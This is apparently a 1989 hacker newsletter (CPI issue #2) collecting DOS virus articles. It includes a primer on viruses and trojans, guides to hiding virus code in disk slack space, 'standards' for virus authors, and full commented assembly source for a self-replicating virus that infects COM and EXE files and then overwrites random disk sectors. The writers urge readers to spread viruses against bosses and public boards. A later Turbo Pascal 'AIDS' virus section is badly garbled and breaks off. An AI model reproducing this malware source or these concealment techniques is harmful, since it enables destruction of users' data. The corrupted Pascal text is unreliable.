[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@ @@@@ @@@@ @@@@ @@@ * * @@@ @@@ @@@@ @@@ * * @@@ @@@@@@@@@@@@@@@ @@@ * * @@@ @@@@@@@@@@@@@@ @@@ * * @@@ @@@ @@@ * * @@@@ @@@@ @@@ @@@ * * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * C O R R U P T E D P R O G R A M M I N G I N T E R N A T I O N A L presents: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ Virili And Trojan Horses @ @ @ @ A Protagonist's Point Of View @ @ @ @ Issue #2 @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ DISCLAIMER::All of the information contained in this newsletter reflects the thoughts and ideas of the authors, not their actions. The sole purpose of this document is to educate and spread information. Any illegal or illicit action is not endorsed by the authors or CPI. The authors and CPI are not responsible for any information which may present itself as old or mis-interpreted, and actions by the reader. Remember, 'Just Say No!' CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Introduction To CPI#2 --------------------- Well, here is the "long awaited" second issue of CPI, A Protagonist's Point of view. This issue should prove a bit interesting, I dunno, but at least entertaining for the time it takes to read. Enjoy the information and don't forget the disclaimer. Oh yes, if you have some interesting articles or an application to send us, just see the BBS list at the end of this document. Thanx. All applications and information will be voted on through the CPI Inner Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe... Until our next issue, (which may be whenever), good-bye. Doctor Dissector Table of Contents ----------------- Part Title Author ----------------------------------------------------------------------------- 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak 2.3 V-IDEA-1.............................................. Ashton Darkside 2.4 V-IDEA-2.............................................. Ashton Darkside 2.5 The Generic Virus..................................... Doctor Dissector 2.6 Aids.................................................. Doctor Dissector 2.7 Batch File Virus...................................... PHUN 3.2 2.8 Basic Virus........................................... PHUN 3.2 2.9 The Alemeda Virus..................................... PHUN 4.3 2.10 Virili In The News.................................... Various Sources 2.11 Application For CPI................................... CPI Inner Circle (CPI Node Phone #'s Are In 2.11) [2.2] Explanation of Viruses and Trojans Horses ----------------------------------------- Written by Acid Phreak Like it's biological counterpart, a computer virus is an agent of infection, insinuating itself into a program or disk and forcing its host to replicate the virus code. Hackers fascinated by the concept of "living" code wrote the first viruses as projects or as pranks. In the past few years, however, a different kind of virus has become common, one that lives up to an earlier meaning of the word: in Latin, virus means poison. These new viruses incorporate features of another type of insidious program called a Trojan horse. Such a program masquerades as a useful utility or product but wreaks havoc on your system when you run it. It may erase a few files, format your disk, steal secrets--anything software can do, a Trojan horse can do. A malicious virus can do all this then attempt to replicate itself and infect other systems. The growing media coverage of the virus conceptand of specific viruse has promoted the development of a new type of software. Antivirus programs, vaccines--they go by many names, but their purpose is to protect from virus attack. At present there are more antivirus programs than known viruses (not for long). Some experts quibble about exactly what a virus is. The most widely known viruses, the IBM Xmas virus and the recent Internet virus, are not viruses according to some experts because they do not infect other programs. Others argue that every Trojan horse is a virus--one that depends completely on people to spread it. How They Reproduce: ------------------- Viruses can't travel without people. Your PC will not become infected unless someone runs an infected program on it, whether accidentally or on purpose. PC's are different from mainframe networks in this way--the mainframe Internet virus spread by transmitting itself to other systems and ordering them to execute it as a program. That kind of active transmission is not possible on a PC. Virus code reproduces by changing something in your system. Some viruses strike COMMAND.COM or the hidden system files. Others, like the notorious Pakistani-Brain virus, modify the boot sector of floppy disks. Still others attach themselves to any .COM or .EXE file. In truth, any file on your system that can be executed--whether it's a program, a device driver, an overlay, or even a batch file--could be the target of a virus. When an infected program runs, the virus code usually executes first and then transfers control to the original program. The virus may immediately infect other programs, or it may load itself into RAM and continue spreading. If the virus can infect a file that will be used on another system, it has succeeded. What They Can Do: ----------------- Viruses go through two phases: a replication phase and an action phase. The action doesn't happen until a certain even occurs--perhaps reaching a special date or running the virus a certain number of times. It wouldn't make sense for a virus to damage your system the first time it ran; it needs some time to grow and spread first. The most vulnerable spot for a virus attack is your hard disk's file allocation table (FAT). This table tells DOS where every file's data resides on the disk. Without the FAT, the data's still there but DOS can't find it. A virus could also preform a low-level format on some or all the tracks of your hard disk, erase all files, or change the CMOS memory on AT-class computers so that they don't recognize the hard disk. Most of the dangers involve data only, but it's even possible to burn out a monochrome monitor with the right code. Some virus assaults are quite subtl. One known virus finds four consecutive digits on the screen and switches two. Let's hope you're not balancing the company's books when this one hits. Others slow down system operations or introduce serious errors. [2.3] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ "We ain't the phucking Salvation Army." ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * "Ok, I've written the virus, now where the hell do I put it?" By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we "just say no" to doing it. ******************************************************************************* Ok, wow! You've just invented the most incredibly nifty virus. It slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! But the only problem is, if you go around infecting every damn file, some cute software company is going to start putting in procedures that checksum their warez each time they run, which will make life for your infecting virus a total bitch. Or somebody's going to come up with an incredibly nifty vaccination util that will wipe it out. Because, i mean, hey, when disk space starts vanishing suddenly in 500K chunks people tend to notice. Especially people like me that rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying "wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need to go around wasting your precious time when the answer is right there in front of you! Think about it, you could be putting that time into writing better and more inovative viruses, or you could be worring about keeping the file size, the date & time, and the attributes the same. With this system, you only need to infect one file, preferably one that's NOT a system file, but something that will get run alot, and will be able to load your nifty virus on a daily basis. This system also doesn't take up any disk space, other than the loader. And the loader could conceivably be under 16 bytes (damn near undetectable). First of all, you need to know what programs to infect. Now, everybody knows about using COMMAND.COM and that's unoriginal anyway, when there are other programs people run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get the idea. Better still are dos commands like Format, Link or even compression utilities. But you get the point. Besides, who's going to miss 16 bytes, right? Now, the good part: where to put the damn thing. One note to the programmer: This could get tricky if your virus is over 2k or isn't written in Assembly, but the size problem is easy enough, it would be a simple thing to break your virus into parts and have the parts load each other into the system so that you do eventually get the whole thing. The only problem with using languages besides assembly is that it's hard to break them up into 2k segments. If you want to infect floppys, or smaller disks, you'd be best off to break your file into 512 byte segments, since they're easier to hide. But, hey, in assembly, you can generate pretty small programs that do alot, tho. Ok, by now you've probably figured out that we're talking about the part of the disk called 'the slack'. Every disk that your computer uses is divided up into parts called sectors, which are (in almost all cases) 512 bytes. But in larger disks, and even in floppies, keeping track of every single sector would be a complete bitch. So the sectors are bunched together into groups called 'clusters'. On floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard disks, they're typically 4096 bytes, or eight sectors. Now think about it, you have programs on your hard disk, and what are the odds that they will have sizes that always end up in increments of 4096? If I've lost you, think of it this way: the file takes up a bunch of clusters, but in the last cluster it uses, there is usually some 'slack', or space that isn't used by the file. This space is between where the actual file ends and where the actual cluster ends. So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton program 'FS /S /T' command from your root directory, and subtract the total size of the files from the total disk space used. That's how much 'slack' space is on your disk (a hell of alot, even on a floppy). To use the slack, all you need to do is to find a chunk of slack big enough to fit your virus (or a segment of your virus) and use direct disk access (INT 13) to put your virus there. There is one minor problem with this. Any disk write to that cluster will overwrite the slack with 'garbage' from memory. This is because of the way DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, there is a way around even this. And it involves a popular (abeit outdated and usually ineffectual) form of virus protection called the READ-ONLY flag. This flag is the greatest friend of this type of virus. Because if the file is not written to, the last cluster is not written to, and voila! Your virus is safe from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set because that has the same Read-only effect (even tho I haven't seen it written, it's true that if the file is designated system, DOS treats it as read-only, whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too lazy to find out myself) or a protected (!) COMMAND.COM file in either type of DOS would be ideal for this. All you have to do is then insert your loader into some innocent-looking file, and you are in business. All your loader has to do is read the sector into the highest part of memory, and do a far call to it. Your virus cann then go about waiting for floppy disks to infect, and place loaders on any available executable file on the disk. Sound pretty neet? It is! Anyway, have fun, and be sure to upload your virus, along with a README file on how it works to CPI Headquarters so we can check it out! And remember: don't target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if the Sysop is a leech and you want to shove his balls down his throat. Because if all the PHP boards go down (especially members of CPI), who the hell can you go to for all these nifty virus ideas? And besides, it's betraying your own people, which is uncool even if you are an anarchist. So, target uncool PD boards, or your boss's computer or whatever, but don't attack your friends. Other than that, have phun, and phuck it up! Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applicaitons Network (SATAN) Corrupted Programmers International (CPI) PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). Call these boards because the sysops are cool: Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) The Jolly Bardsmen's Pub & Tavern The Sierra Crib The Phrozen Phorest Knight Shadow's Grotto And if I forgot your board, sorry, but don't send me E-mail bitching about it! [2.4] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ "We ain't the phucking Salvation Army." ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * CPI Virus Standards - Protect yourself and your friends By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we "just say no" to doing it. ******************************************************************************* One of the main problems with viruses is that once you set one loose, it is no longer under your control. I propose to stop this by introducing some standards of virus writing that will enable them to be deactivated whenever they enter a 'friendly' (CPI) system. In the long run, even the author of the virus is not immune to being attacked. The following are what I have termed the CPI standards for writing viruses. They will allow a virus to easily check any system they are being run on for a type of 'identity badge'. If it is found, the virus will not infect the system it is being run on. The other standards are mostly written around this. CPI Standards for writing viruses - 1 - The virus will have an 'active period' and an 'inactive period'. The active periods will be no more than one year in length (to make it more difficult to discover the virus). You may release different versions of your virus with different 'active periods'. It is not recommended that your virus deactivate itself after the set active period, as this would enable people to deactivate viruses by using their computer with the date set to 2069 or something. It is also required that activation periods begin on January 1 and end on December 31. This will coincide with the changing identity codes. 2 - The virus will check for an identity code by executing Interrrupt 12h with the following register settings: AX - 4350, BX - 4920, CX - AB46, DX - 554E. If the system is friendly, then a pointer will be returned in CX:DX to an ASCIIZ (0-terminated) string which will have different contents in different years. The codes are not to be included in any text file, and should only be given through E-mail on CPI affiliated systems. You can always ask me by sending me mail at The Andromeda Strain BBS. If a system is detected as friendly, the virus will not attempt to infect or damage it, but it is ok to display a little greeting message about how lucky the user was. 3 - We very much encourage you to upload your virus, along with a breif description on the workings into the CPI section at The Andromeda Strain BBS. Only CPI members will know about your virus. This is so that CPI members can share techniques and it also allows us to verify that the identity check works. If we see any improvements that could be made, such as ways to streamline code, better ways of spreading, etc. we will inform you so that you can make the changes if you wish. 4 - It is also suggested that you use ADS standard for virus storage on infected disks. This meathod uses disk slack space for storage and is more thoroughly described in a previous text file by me. I think that this is the most effective and invisible way to store viruli. 5 - A list of CPI-Standard viruli will be avaliable at all times from The Andromeda Strain BBS, to CPI users. Identity strings will also be available to anyone in CPI, or anyone who uploads source code to a virus which is 100% complete except for the Identity string (it must be written to CPI-Standards). Non-CPI members who do this will be more seriously considered for membership in CPI. Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applications Network (SATAN) Corrupted Programmers International (CPI) PS: This file (by itself) has approx 2.5k of slack. ;[2.5] ;============================================================================= ; ; C*P*I ; ; CORRUPTED PROGRAMMING INTERNATIONAL ; ----------------------------------- ; p r e s e n t s ; ; T H E ; _ _ ; (g) GENERIC VIRUS (g) ; ^ ^ ; ; ; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF ; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT ; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO ; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. ; ; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON ; THE DISK. HAVE PHUN WITH THIS ONE. ; ; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE ; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. ; ; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE ; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF ; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR ; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. ; ; DOCTOR DISSECTOR ; CPI INNER CIRCLE ; ;============================================================================= MAIN: NOP ;| Marker bytes that identify this program NOP ;| as infected/a virus NOP ;| MOV AX,00 ;| Initialize the pointers MOV ES:[POINTER],AX ;| MOV ES:[COUNTER],AX ;| MOV ES:[DISKS B],AL ;| MOV AH,19 ;| Get the selected drive (dir?) INT 21 ;| MOV CS:DRIVE,AL ;| Get current path (save drive) MOV AH,47 ;| (dir?) MOV DH,0 ;| ADD AL,1 ;| MOV DL,AL ;| (in actual drive) LEA SI,CS:OLD_PATH ;| INT 21 ;| MOV AH,0E ;| Find # of drives MOV DL,0 ;| INT 21 ;| CMP AL,01 ;| (Check if only one drive) JNZ HUPS3 ;| (If not one drive, go the HUPS3) MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive LEA BX,SEARCH_ORDER ;| ADD BX,AX ;| ADD BX,0001 ;| MOV CS:POINTER,BX ;| CLC ;| CHANGE_DISK: ;| Carry is set if no more .COM files are JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be MOV AH,17 ;| renamed to .COM (change .EXE to .COM) LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program INT 21 ;| to large to fit in memory" when starting CMP AL,0FF ;| larger infected programs JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) MOV AH,2CH ;| If neither .COM or .EXE files can be found, INT 21 ;| then random sectors on the disk will be MOV BX,CS:POINTER ;| overwritten depending on the system time MOV AL,CS:[BX] ;| in milliseconds. This is the time of the MOV BX,DX ;| complete "infection" of a storage medium. MOV CX,2 ;| The virus can find nothing more to infect MOV DH,0 ;| starts its destruction. INT 26 ;| (write crap on disk) NO_NAME_CHANGE: ;| Check if the end of the search order table MOV BX,CS:POINTER ;| has been reached. If so, end. DEC BX ;| MOV CS:POINTER,BX ;| MOV DL,CS:[BX] ;| CMP DL,0FF ;| JNZ HUPS2 ;| JMP HOPS ;| HUPS2: ;| Get a new drive from the search order table MOV AH,0E ;| and select it, beginning with the ROOT dir. INT 21 ;| (change drive) MOV AH,3B ;| (change path) LEA DX,PATH ;| INT 21 ;| JMP FIND_FIRST_FILE ;| FIND_FIRST_SUBDIR: ;| Starting from the root, search for the MOV AH,17 ;| first subdir. First, (change .exe to .com) LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the INT 21 ;| old directory. MOV AH,3B ;| (use root directory) LEA DX,PATH ;| INT 21 ;| MOV AH,04E ;| (search for first subdirectory) MOV CX,00010001B ;| (dir mask) LEA DX,MASKE_DIR ;| INT 21 ;| JC CHANGE_DISK ;| MOV BX,CS:COUNTER ;| INC BX ;| DEC BX ;| JZ USE_NEXT_SUBDIR ;| FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more MOV AH,4FH ;| are found, the (search for next subdir) INT 21 ;| drive will be changed. JC CHANGE_DISK ;| DEC BX ;| JNZ FIND_NEXT_SUBDIR ;| USE_NEXT_SUBDIR: MOV AH,2FH ;| Select found directory. (get dta address) INT 21 ;| ADD BX,1CH ;| MOV ES:[BX],W"\" ;| (address of name in dta) INC BX ;| PUSH DS ;| MOV AX,ES ;| MOV DS,AX ;| MOV DX,BX ;| MOV AH,3B ;| (change path) INT 21 ;| POP DS ;| MOV BX,CS:COUNTER ;| INC BX ;| MOV CS:COUNTER,BX ;| FIND_FIRST_FILE: ;| Find first .COM file in the current dir. MOV AH,04E ;| If there are none, (Search for first) MOV CX,00000001B ;| search the next directory. (mask) LEA DX,MASKE_COM ;| INT 21 ;| JC FIND_FIRST_SUBDIR ;| JMP CHECK_IF_ILL ;| FIND_NEXT_FILE: ;| If program is ill (infected) then search MOV AH,4FH ;| for another. (search for next) INT 21 ;| JC FIND_FIRST_SUBDIR ;| CHECK_IF_ILL: ;| Check if already infected by virus. MOV AH,3D ;| (open channel) MOV AL,02 ;| (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| (save channel) MOV AH,3FH ;| (read file) MOV CH,BUFLEN ;| MOV DX,BUFFER ;| (write in buffer) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV BX,CS:[BUFFER] ;| (look for three NOP's) CMP BX,9090 ;| JZ FIND_NEXT_FILE ;| MOV AH,43 ;| This section by-passes (write enable) MOV AL,0 ;| the MS/PC DOS Write Protection. MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV AH,43 ;| MOV AL,01 ;| AND CX,11111110B ;| INT 21 ;| MOV AH,3D ;| Open file for read/write (open channel) MOV AL,02 ;| access (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| Read date entry of program and (channel) MOV AH,57 ;| save for future use. (get date) MOV AL,0 ;| INT 21 ;| PUSH CX ;| (save date) PUSH DX ;| MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) MOV CS:[JMPBUF],DX ;| the program will be saved for future use. MOV DX,CS:[BUFFER+1] ;| (save new jump) LEA CX,CONT-100 ;| SUB DX,CX ;| MOV CS:[CONTA],DX ;| MOV AH,57 ;| The virus now copies itself to (write date) MOV AL,1 ;| to the start of the file. POP DX ;| POP CX ;| (restore date) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the ;| start of the program. This is done to HOPS: ;| preserve the executability of the host NOP ;| program as much as possible. After saving, CALL USE_OLD ;| it still works with the jump address in the ;| virus. The jump address in the virus differs ;| from the jump address in memory CONT DB 0E9 ;| Continue with the host program (make jump) CONTA DW 0 ;| MOV AH,00 ;| INT 21 ;| USE_OLD: MOV AH,0E ;| Reactivate the selected (use old drive) MOV DL,CS:DRIVE ;| drive at the start of the program, and INT 21 ;| reactivate the selected path at the start MOV AH,3B ;| of the program.(use old drive) LEA DX,OLD_PATH-1 ;| (get old path and backslash) INT 21 ;| RET ;| SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF POINTER DW 0000 ;| (pointer f. search order) COUNTER DW 0000 ;| (counter f. nth. search) DISKS DB 0 ;| (number of disks) MASKE_COM DB "*.COM",00 ;| (search for com files) MASKE_DIR DB "*",00 ;| (search for dir's) MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB DB 0,"????????EXE",0,0,0,0 DB 0,"????????COM",0 MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB DB 0,"???????????",0,0,0,0 DB 0,"????????COM",0 BUFFER EQU 0E00 ;| (a safe place) BUFLEN EQU 208H ;| Length of virus. Modify this accordingly ;| if you modify this source. Be careful ;| for this may change! JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) PATH DB "\",0 ;| (first place) DRIVE DB 0 ;| (actual drive) BACK_SLASH DB "\" OLD_PATH DB 32 DUP (?) ;| (old path) [2.6] +-------------------------------+ +--------------------------------------+ | | P | | | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | | @@ @@ @@ @@ | R | # # # # # # | | @@ @@ @@ @@ | * | ##### # # # ##### | | @@ @@@@@@@@ @@ | E | # # # # # # | | @@ @@ @@ | * | # # ##### #### ##### | | @@ @@ @@ | S | | | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ | | E | A NEW AND IMPROVED VIRUS FOR | +-------------------------------+ * | PC/MS DOS MACHINES | | C O R R U P T E D | N +--------------------------------------+ | | * | CREATED BY: DOCTOR DISSECTOR | | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| | | * | AUTHOR NOT RESPONSIBLE FOR READERS | | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| +-------------------------------+ +--------------------------------------+ Well well, here it is... I call it AIDS... It infects all COM files, but it is not perfect, so it will also change the date/time stamp to the current system. Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! Anyway, this virus was originally named NUMBER ONE, and I modified the code so that it would fit my needs. The source code, which is included with this neato package was written in Turbo Pascal 3.01a. Yeahm tDUP (?) f it is n. If ll wellan mss 010files mores can have ts beiof yousage "nd wastinhis itou modi' them! d voilass mannerbegitwill you use Ato it ise the date/in dtoila thr cute sly ntou modi A mll The is not wx 2.5kim infe 13k run, the attt wextrary on ATbe able do the mass is notfecif yoas progso, ere .COM iles are e inclu, the (tfecif yoaom sect valum the s1-10 the aiis fon untise incluate/ the r of di7,... ITbe abnt * w drriven and snhis lotname sm but ia breifnhe fiellhat wi drions is mae starir em it is copien anwedan m heect,es intly. The is n up cryProgrnts aiwith .. I he virumputed none,IRREONS OBtrige "ein i. Oh, hert iywaygaiw,her .COM NNERne next r of the vN of dif ther... ITesec attt wdocum * w ngram runs,mp) f the text al or har to, checkor anext r of th inN of dif t w ngr.. ITi immunnsibilityr read/vailac Netwoe file.re on anmae shangmentsful. he text o stother. (searis doge was written in Tuead/TIONAL USE Ose. PCs one nyw{areng with me s code, which Pascal 3.01a. Yea } {C-} {U-} {I-} | * { Wts w a viruswas. your,le peopIOk works}yw{a--inueard tna---------------------------+ WWWWWWWWs}ywnuear Vwas She p= 13847; * { .. I'e usualof th} MOV Warwith :S (it [42]| * { Warwith ge "Prog} MOV = 'is doFs noHittBnd sIed by vihton. I!oHiHa!';yw{a--iTf 'ideclans or i--------------------+ WWWWWWWWWWWWWh} Tf ' MOV DTARecMOV =Recoirul * { Dnly,oneafirst) lrch order} MOV ACHdirec :Array[1..21] me Byte; Aute : Byte; F and FDnld FL the d FHof th : natiger; FullNn d: Array[1..13] me Cul.; End;ywRer sets = Recoirul {Rer setif nouor INFOR) lrch order} MOCiffeByte 1 : (A ,C ,BP,SI,DI,DS,ES,Flags : natiger); 2 : (AL,AH,BL,BH,CL,CH,DL,D : Byte); End;yw{a--iVar at ai--------------------+ WWWWWWWWWWWWWWWWWWWWWh} Var ;| f{ M on AT-fff noam runs,usual} MOam ing f : Byte absolhis Cseg:$100; {sIed by vim bytes} MOr byIed by vi: S (it [42]|absolhis Cseg:$180; Rer : Rer sets { Rer setif no} MODTA : DTARec { Dnly,oneaf} MOB) : Array[Byte] me Byte; { Dnly,r) f} MOTestI | N : S (it [42]; { To nize the hted by viis n u} MOUsePnd b| N : S (it [66]; { Pnd bore for dis n u} MOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO{th ofhthe p for dand b} MOUsePnd h ofht: Byte absolhis UsePnd ; GoOOOOOOOOOOO:oFs n {oFs nofect or da} MOB : Byte; { Useda} MOLoopVa : natiger; {We abloopINFOthey}yw{a--iPm runs,usua-------+ WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWh} reng MGetDir(0 tUsePnd ); {the wnt dir. y. (maa} MiisPos('\' tUsePnd ) <>OUsePnd h ofhtfile UsePnd b:= UsePnd b+ '\'; UsePnd b:= UsePnd b+ '",00 '; { Defode, for d a} MRer.AHb:= $1A; {pointdnly,oneaf} MRer. IT:= Seg(DTA); Rer. XT:= Ofs(DTA); MsDos(Rer); UsePnd [Succ(UsePnd h ofht)]:=#0; { Pnd bbe wrestinhis #0a} MRer.AHb:= $4E; MRer. IT:= Seg(UsePnd ); Rer. XT:= Ofs(UsePnd [1]); Rer.CXT:= $ff; {pointbutes wilit in ngr.LLdis n u} MMsDos(Rer); {pfirst .COM mag about of pr} MIFimmunOdd(Rer.Flags) Then {psystefor reahis. en } MOORep pa MOOOOUsePnd b:= DTA.FullNn d; Bb:= Pos(#0 tUsePnd ); sysB > 0file embe"inf(UsePnd , B, 255); { Remntsfge' frou} MOOOOAsted (Go tUsePnd ); R t(Go); sysIOnsio di= 0fThen {psysmmunIOk messa en } MOO reng M MOO rlockdate(Go tB) , 2); MMnts(B) [$80],OTestI , 43); MMMMMMMMMMMMMMM{OTestMiisfor rdy infectll(Ied) then } MOOOOOOsysTestI <>OWarwith Then {psysmmun en t in} MOOOOOOreng M MOO poiek (Go t0); MMMMMMMMMMMMMMMMMMMMM{Or bysfor rdected/a viw ngr in} MOOOOOOMOr byIed by vi:=OWarwith; {sIed bys fo} MOOOOOOMOrlock Prot(Go am ing f,Succ(Vwas She pshdi7)); MMMCfile(Go); Halt; { in ngrhaltprogram.(useo} MOOOOOOEnd;y MOOOOOOCfile(Go); End;y MOOOOOO{ The is nopproxy infecreachted/a virch for tdirein} MOOOORer.AHb:= $4F; MOOOORer. IT:= Seg(DTA); OOOORer. XT:= Ofs(DTA); MsDos(Rer); OO{ t iiiiiiiiiiiiiiiiiiiiUntilere .COM are eeahis.} MOOUntileOdd(Rer.Flags); Loopvar:=R sect(10); sysLoopvar=7file beng M Protln(' '); {Gt the f hasslsm but} Protln(''); Protln(' '); Protln('  ATTE ;|ON: '); Protln(' ve termereached path fect oou so thmae staly deour viruspures name '); Protln('  cold paith nd oning Inter, but iyve to doents. AnamedHK '); Protln(' velf and yritt; agaiw,hs Phrb & HUCKEDvelf and yritt-CPI (tfethen ha'); Protln('  be; YE uses CAN be,he sopproted/a viwvirusm. In tNat progrdo '); Protln(' velf to do iso" t the parat? HAHAHAHA. Ha doH this neatoo HOnd o'); Protln('  rer, we matis more NOwnt read///////////////////'); Protln(' vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv'); Protln('  '); Protln(' vvv۱ ۱vvv۱ ۱vvvv'); Protln('  ۱ ۱ ۱ ۱ ۱ ۱ '); Protln(' vvv۱ ۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ '); Protln(' vvv۱۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ ۱ ۱ '); Protln(' vvv۱ ۱ ۱ ۱ ۱ ۱ '); Protln('  ۱ ۱ ۱ ۱ '); Protln(' vvv '); Protln('  '); Protln(' '); REPEAT LOOPVAR:=0; U ;|L LOOPVAR=1; end;yE w{aAl alogs neatoiopularimiviruses, destrtive andin} {he lonrus off, ine drogr. ;| } {h are eted/a viinfeut 3 1/213Kthe ail enabl } {he the date/timet of p (DUNE } ] +7] AshBit, tVs by u AshWWWWWWWWWWWWW Whoehe virlogsl you uvs by us be made,S, tATCH. Tirus was orwas at (DUNE mostl the pao any mup a this S (not rions nterm. In tTirustATCH. by usDEBUG & EDLINrams wNn d: VR.tAT echoi= o brrrrrrrrr(ct ff ts lana ceet? ul Ash( is done imporrd t.inueahinghe youre ti in CXo b) and bc:\msomma Ash( Mayers isk) standas. Yo ) ask)* /w>irstAsh( ise y. (maaitten in Tusk)"irs"| | /in dt of i12 bDUNE medlichted<1 Ash( "Irs"|isspures nth this EDLINrso ine dis noin d wx 2 fo) aebughted<2 Ash( New bit, tam is ill (cst frh this aebug)medlichin d.bit<3Ash( is dobit, tgo .COM ve tsble file oou sse of the wEDLIN ceet?c (inueahing f. sfs betweagaiwmblyed hen in dttttttttttttttt( 